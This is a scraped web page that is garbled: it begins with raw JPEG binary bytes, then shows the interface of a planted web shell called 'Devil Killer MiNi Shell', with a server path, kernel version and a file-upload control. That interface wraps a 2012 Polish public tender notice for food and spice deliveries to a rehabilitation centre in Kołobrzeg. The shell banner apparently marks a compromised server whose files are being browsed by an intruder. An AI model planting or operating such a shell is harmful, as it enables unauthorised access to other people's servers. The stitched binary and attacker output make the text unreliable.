JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/428884-N-2012.html

<p class="kh_header"><b>Kołobrzeg: OKRESOWE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH - WARZYW I OWOCÓW KONSERWOWYCH, PRZETWORZONYCH, SOSÓW, ZUP I BULIONÓW, ZIÓŁ 
I PRZYPRAW, MIESZANEK PRZYPRAW I MIESZANEK PRZYPRAW KORZENNYCH, OWOCÓW SUSZONYCH, PRODUKTÓW PIEKARSKICH, RYŻU PRZETWORZONEGO, RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH
	15/2012</b><br>
<b>Numer ogłoszenia: 428884 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA , ul. C. K. Norwida 3, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3552010, faks 094 3552011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niwa.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OKRESOWE DOSTAWY ARTYKUŁÓW SPOŻYWCZYCH - WARZYW I OWOCÓW KONSERWOWYCH, PRZETWORZONYCH, SOSÓW, ZUP I BULIONÓW, ZIÓŁ 
I PRZYPRAW, MIESZANEK PRZYPRAW I MIESZANEK PRZYPRAW KORZENNYCH, OWOCÓW SUSZONYCH, PRODUKTÓW PIEKARSKICH, RYŻU PRZETWORZONEGO, RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH
	15/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Okresowe dostawy artykułów spożywczych - warzyw i owoców konserwowych, przetworzonych, sosów, zup 
i bulionów, ziół i przypraw, mieszanek przypraw i mieszanek przypraw korzennych, owoców suszonych, produktów piekarskich, ryżu przetworzonego, różnych produktów spożywczych - w okresie 1 roku od dnia 23.11.2012 r.
2.	Szczegółowy asortyment zamówienia znajduje się w załączniku nr 2 do SIWZ.
3.	Przedmiot zamówienia winien spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego żywności a w szczególności:
1)	ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136 poz. 914 ze zm.),
2)	ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych. (Dz. U. z 2005 r. Nr 187, poz. 1577 ze zm.),
3)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r., nr 17, poz. 127 ze zmianami) oraz aktami wykonawczymi wydanymi na podstawie tej ustawy,
4)	rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych ( Dz. U. Nr 137, poz. 966 ze zm.).
5)	rozporządzenia Nr 178/2002 Parlamentu Europejskiego i Rady z dnia 28 stycznia 2002 r. ustanawiające ogólne zasady i wymagania prawa żywnościowego, powołujące Europejski Urząd ds. bezpieczeństwa żywności oraz ustanawiające procedury w zakresie bezpieczeństwa żywności (Dz.Urz.WE nr L31/1 z dnia 01.02.2002 r.),
6)	rozporządzenia (WE) Nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004r. w sprawie higieny środków spożywczych (Dz.Urz.UE L139/1 z dnia 30.04.2004 r.), 
7)	rozporządzenia (WE) Nr 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004r. ustanawiające szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz.U. L 139 z 30.4.2004)
8)	rozporządzenia Komisji Nr 1441/2007 z dnia 5 grudnia 2007 r. zmieniającego rozporządzenie (WE) nr 2073/2005 w sprawie kryteriów mikrobiologicznych dotyczących środków spożywczych (Dz.Urz.UE L322/12 z dnia 7.12.2007 r.).
9)	rozporządzenia Komisji Nr 1881/2006 z dnia 19 grudnia 2006 r. ustalającego najwyższe dopuszczalne poziomy niektórych zanieczyszczeń w środkach spożywczych (Dz.Urz.UE L364/5 z dnia 20.12.2006 r.)
10)	rozporządzenia Nr 1935/2004 Parlamentu Europejskiego i Rady z dnia 27 października 2004r., 
w sprawie materiałów i wyrobów przeznaczonych do kontaktu z żywnością oraz uchylające Dyrektywy 80/590/EWG i 89/109/EWG  (Dz.Urz.UE L384/4 z dnia 13.11.2004 r.),
3.	Dostawy przedmiotu zamówienia będą realizowane w asortymencie, ilościach i terminach wskazanych każdorazowo przez zamawiającego w zamówieniu - pod rygorem odmowy przyjęcia dostawy i dokonania zapłaty. 
4.	Ilości określone przez zamawiającego są ilościami orientacyjnymi, które mogą ulec zmianie z uwagi 
na różnice w obłożeniu obiektu, zmianę kategorii gości, zalecone diety oraz specyfikę sporządzania posiłków, w związku, z czym Zamawiający zastrzega sobie prawo do zmiany asortymentu dostaw w poszczególnych pozycjach załącznika nr 3 do umowy, po cenach w nim określonych.
5.	Biorąc pod uwagę zapis pkt 4 zapotrzebowanie określone w załączniku nr 3 do umowy nie jest wiążące 
dla Zamawiającego i jego niezrealizowanie nie będzie stanowić podstawy roszczeń odszkodowawczych Wykonawcy.
6.	CPV: 15.80.00.00-6  Różne produkty spożywcze,
LP	Nazwa produktu	Ilość 	JM
1	Ananas konserwowy w plastrach   skład  Ananas w syropie                             Opakowanie od  0,3 do 0,4 )	100	szt
2	Aromaty do ciast mix-paluszki	100	szt
3	Bazylia  Opakowanie ok.10g	10	szt
4	Biały barszcz Knorr lub produkt równoważny (Mąka pszenna, tłuszcz roślinny, substancje wzmacniające smak i zapach ) Opakowania  ok.1kg	60	szt
5	Brzoskwinie konserwowe - połówki owoców  skład  Brzoskwinia w syropie; Opakowanie nie mniejsze niż 0,44-0,5kg)	100	szt
6	Budyń-   Malinowy, śmietankowy, waniliowy, czekoladowy   Opakowanie ok. 1kg	250	szt
7	Buraczki ćwikłowe w zalewie; Opakowanie 1700-1800ml	20	szt
8	Cebulki mini (biała, żółta); Opakowanie 314-330ml	15	szt
9	Chrzan  skład (Chrzan, kwasek cytrynowy ); Opakowanie 0,85-1,0kg	130	szt
10	Cukier waniliowy; Opakowanieok ok. 0,50kg	28	kg
11	Cynamon; Opakowanie ok.20 g	10	szt
12	Czosnek granulowany  Opakowanie ok.1kg	16	szt
13	Ćwikła z chrzanem  skład Buraki ćwikłowe, chrzan; Opakowania około 0,27- 0,3kg	250	szt
14	Dżem owocowy - różne smaki   Wysokosłodzony  kl I                   Opakowanie od 6,5 -7kg	1200	kg
15	Dżem owocowy- różne smaki słodzony fruktozą 43g owoców na 100 g produktu; Opakowanie 195g-250g	20	szt
16	Fasola konserwowa czerwona; Opakowanie  1400-1,600kg)	10	szt
17	Galaretka  Owocowa  - różne smaki; Opakowanie ok.1 kg	600	szt
18	Gałka muszkatołowa mielona  Opakowanie ok.15 g	50	szt
19	Goździki opakowanie ok. 150g	25	szt
20	Groszek konserwowy; Opakowania1560- 1,840kg)	100	szt
21	Gruszka w syropie; Puszka 2,65-3 kg 	10	szt
22	Imbir   Opakowanie ok.20 g	50	szt
23	Jałowiec ; Opakowanie ok.20g	5	szt
24	Kakao  Wedel  lub produkt równoważny  Opakowanie  ok.100g	10	szt
25	Kawa inka  lub produkt równoważny; Opakowanie od 150g-180g	400	szt
26	Keczup Włocławek lub produkt równoważny  - skład Koncentrat pomidorowy 30%, cebula, seler, przyprawy; Opakowania około 1kg	850	szt
27	Kiełki fasoli  mung ; Opakowanie  370-400ml	50	szt
28	Kisiel z cukrem -  Cytrynowy, owocowy; Opakowanie ok.1kg	500	szt
29	Kminek; Opakowanie ok. 20g	5	szt
30	Koncentrat barszczu czerwonego; Zagęszczony sok z buraków ćwikłowych;  Opakowanie około 0,3l-0,33l	50	szt
31	Koncentrat pomidorowy 30%   Złoty bażant lub produkt równoważny Opakowanie 0,85-1,0kg                                                        	400	szt
32	Kotlety sojowe  Na bazie odtłuszczonej maki sojowej, niemodyfikowane genetycznie Opakowanie ok.100g	50	szt
33	Kukurydza konserwowa; Opakowania  1,400kg-1600)	150	szt
34	Kwasek cytrynowy; Opakowanie ok. 1 kg	20	kg
35	Liść laurowy   Opakowanie ok. 0,5kg	24	szt
36	Majeranek   Luz    Opakowanie ok.1kg	15	kg
37	Majonez dekoracyjny Winiary lub produkt równoważny.       Skład  Olej roślinny, żółtko jaja nie mniej niż 6%, musztarda, przyprawy                                  Słoik ok. 0,7kg	250	szt
38	Masa makowa; Puszka 0,850-0,900 kg	30	szt
39	Miód naturalny wielokwiatowy                                                        Opakowanie od  0,9kg	50	szt
40	Morele suszone; Opakowanie ok.150g	150	szt
41	Mus jabłkowy; Opakowanie  0,820- 0,9kg	200	szt
42	Musztarda  Sarebska lub stołowa o gęstej konsystencji na bazie gorczycy białej, gorczycy czarnej, ocet, przyprawy             Opakowanie ok.  1kg              	700	szt
43	Ocet spirytusowy 10%; Opakowanie ok.0,5l	500	szt
44	Ogórek konserwowy  Fruktus lub produkt równoważny   - skład (Ogórek, ocet spirytusowy ); Opakowanie 0,9-1,0 kg	100	szt
45	Oliwki konserwowe  skład Oliwki zielone ,Oliwki czarne   Opakowanie 0,9 - 0,935kg	50	szt
46	Oregano    Opakowanie ok. 10g	10	szt
47	Orzechy włoskie Opakowanie ok. 0,100kg	10	szt
48	Owoce koktajlowe konserwowe    Ananas, papaja, guana w syropie Opakowanie 370g-450g	15	szt
49	Owoce w syropie  - Mandarynka, wiśnia, czereśnia ,truskawka         Opakowanie 370-400g	20	szt
50	Papryka konserwowa czerwona; Opakowania 1,6-  1,8 kg)	50	szt
51	Papryka mielona; Opakowanie ok. 1kg	40	kg
52	Patisony    Opakowanie 400g-500g)	20	szt
53	Pędy bambusa; Opakowanie 314-330g	150	szt
54	Pieczarki marynowane ; Opakowanie  0,45-0,55kg)	60	szt
55	Pieczywo chrupkie dietetyczne - lekkie; Opakowanie ok. 220-250g	20	szt
56	Pieprz biały; Opakowanie od 700g	5	szt
57	Pieprz czarny mielony   Opakowanie  ok.1kg	15	kg
58	Pieprz ziarnisty   Opakowanie ok. 20g	10	szt
59	Pieprz ziołowy; Opakowanie  ok.20g	10	szt
60	Płatki migdałowe; Całe    Opakowanie ok.50g	20	szt
61	Proszek do pieczenia; Opakowanie 15-35g	250	szt
62	Przyprawa do mięs -Knorr lub produkt równoważny ( Sól,  warzywa suszone, czosnek, cebula, przyprawy, substancje wzmacniajace smak i zapach) Opakowanie ok.700g	10	szt
63	Przyprawa do piernika  Opakowanie ok. 20g	10	szt
64	Przyprawa maślano - ziołowa do warzyw Knorr lub produkt równoważny (Tłuszcz roślinny, masło w proszku, mieszanka przypraw: natka pietruszki,majeranek, cząber,gałka muszkatołowa, pieprz biały, lubczyk ) Opakowanie  ok.1 kg	15	szt
65	Przyprawa w płynie do zup i potraw Knorr lub produkt równoważny (Ekstrakt z lubczyku, woda, sól ) Opakowanie ok.1 l	700	szt
66	Przyprawa warzywna do potraw typu Vegeta lub produkt równoważny ( Sól kuchenna, suszone warzywa nie mniej niż 14%, Substancje wzmacniające smak, przyprawy ) Opakowanie ok.1kg	450	kg
67	Rodzynki    Luz	20	kg
68	Słodzik -  Dietetyczny preparat słodzący Opakowanie od 100 do 300 tabletek	10	szt
69	Sos do deserów  wielosmakowe Opakowanie ok.1 kg	30	szt
70	Pieprz ziołowy  Opakowanie od 0,5 do 1kg	3	kg
71	Sos ogrodowy   Knorr   lub produkt równoważny (sos na bazie ziół, substancje wzmacniające smak i zapach)  Opakowanie ok. 700g	140	szt
72	Suchary bez cukru; Opakowanie  285 -300kg	100	szt
73	Susz owocowy    Luz	5	kg
74	Suszona natka pietruszki; Opakowanie ok.150g	5	szt
75	Szczaw konserwowy; Opakowanie 0,9-1,0kg	25	szt
76	Szparagi konserwowe białe; Opakowanie 0,110-  0,205kg)	20	szt
77	Śliwki suszone; Opakowanie ok.150g	150	szt
78	Tobasco   Opakowanie    0,57-0,60ml	15	szt
79	Wafle ryżowe    Opakowanie  100-140g	20	szt
80	Wiśnia, czereśnia dekoracyjna   Opakowanie 225-250g	10	szt
81	Ziele angielskie  Opakowanie ok. 600g	15	szt
82	Zioła prowansalskie    Opakowanie  ok.250g	5	szt
83	Żelatyna    -  Żelatyna wieprzowa; Opakowanie ok. 1kg	110	kg
84	Żurawina  Opakowanie 314-330ml	10	szt
85	Żurek Knorr lub produkt równoważny ( Mąka żytnia, mleko w proszku lub śmietanka, boczek wędzony, przyprawy, substancje wzmacniające smak i zapach.) Opakowanie  ok.1 kg	55	szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 23.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał (w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej 2 dostawy polegające na dostawach warzyw i owoców konserwowych, przetworzonych, sosów, zup i bulionów, ziół i przypraw, mieszanek przypraw i mieszanek przypraw korzennych, owoców suszonych, produktów piekarskich, ryżu przetworzonego, różnych produktów spożywczych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy te zostały wykonane lub są wykonywane należycie. 
Wykonawca może polegać na wiedzy i doświadczeniu podmiotów trzecich, na zasadzie korzystania 
z zasobów udostępnionych na czas realizacji zamówienia, dołączając do oferty pisemne zobowiązanie tych podmiotów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony  jeżeli wykonawca wykaże, że posiada środki transportu, którymi będzie dostarczał przedmiot zamówienia, odpowiadające wymaganiom sanitarnym, określonym ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U.2010.136.914 ze zmianami) w związku 
z rozporządzeniem nr 852/2004 Parlamentu Europejskiego i Rady Unii Europejskiej z dn. 29 kwietnia 2004 r. (ogólne wymogi higieny dla wszystkich przedsiębiorstw sektora spożywczego - załącznik nr 2 do rozporządzenia).
Wykonawca może polegać potencjale technicznym podmiotów trzecich, na zasadzie korzystania 
z zasobów udostępnionych na czas realizacji zamówienia, dołączając do oferty pisemne zobowiązanie tych podmiotów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP (podstawa prawna art. 59 i 73 ustawy z dnia 
25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia Dz.U.2010.136.914 j.t.)
lub
2)	protokół z urzędowej kontroli żywności, przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej zgodnie z art. 4 Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej nr 882/2004 z dnia 29.04.2004r. Dz. U. UE L.04.139.l, w skład którego wchodzi punkt określający prawidłowości stosowania zasad systemu HACCP (podstawa prawna: art. 9 i 10 rozporządzenia jak wyżej oraz art. 59 i 73 ust. 1 i 6 ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia Dz.U.2010.136.914 j.t.)
lub
3)	certyfikat HACCP - nie dotyczy producentów na etapie produkcji pierwotnej.
Prawo Unii Europejskiej nie zobowiązuje przedsiębiorców do certyfikacji wdrożonego systemu HACCP. System certyfikacji przez niezależne instytucje certyfikujące jest w pełni dobrowolny. Zatem alternatywne sformułowanie wymagań Zamawiającego co do dokumentów potwierdzających wdrożenie i stosowanie HACCP jest w pełni uzasadnione</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
